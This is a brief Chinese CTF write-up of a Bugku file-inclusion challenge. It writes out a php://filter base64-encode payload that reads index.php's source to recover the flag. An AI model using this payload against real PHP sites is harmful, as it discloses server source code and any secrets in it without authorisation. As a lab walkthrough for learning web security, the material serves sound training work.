bugku--文件包含

点击

访问一下index.php

页面报错

既然是文件包含就可以想到php伪协议

这里我们需要访问本地文件系统 构造我们的payload

?file=php://filter/read=convert.base64-encode/resource=index.php

base64解码

得到我们的flag 提交就好啦

?file=php://filter/read=convert.base64-encode/resource=index.php

?file=php://filter/read=convert.base64-encode/resource=index.php

file 访问本地系统,以php的形式,过滤读取 以base64的形式输出出来index.php里面的内容

相关推荐
hengdonghui1 天前
Writeup 4 2020 - 之江杯 - 异常的流量分析
wireshark·ctf·流量分析
hengdonghui1 天前
Writeup 4 津门杯 2021 Web hate_php
php·web·ctf·通配符
hengdonghui2 天前
Writeup 4 红帽杯 2021 Web Find_It
web·ctf·备份文件泄露
hengdonghui2 天前
Writeup 4 强网杯 2019 强网先锋打野
ctf·misc·zsteg
hengdonghui3 天前
Writeup 4 NUAA 2017 robots
android·ctf·re
hengdonghui3 天前
Writeup 4 CSS CTF Semester 2 2026 - Lamp Drill
ctf·re
hengdonghui3 天前
Writeup 4 CSS CTF Semester 2 2026 Cryptography Chrono I
ctf·维吉尼亚密码·crypto
hengdonghui4 天前
Writeup 4 CSS CTF Semester 2 2026 - Dead Faction Servers
ctf·osint
hengdonghui5 天前
Writeup 4 2020 - 之江杯 - 工控现场的恶意扫描
wireshark·ctf·流量分析
hengdonghui5 天前
Writeup 4 2020 - 之江杯 - 异常的工程文件
ctf·工控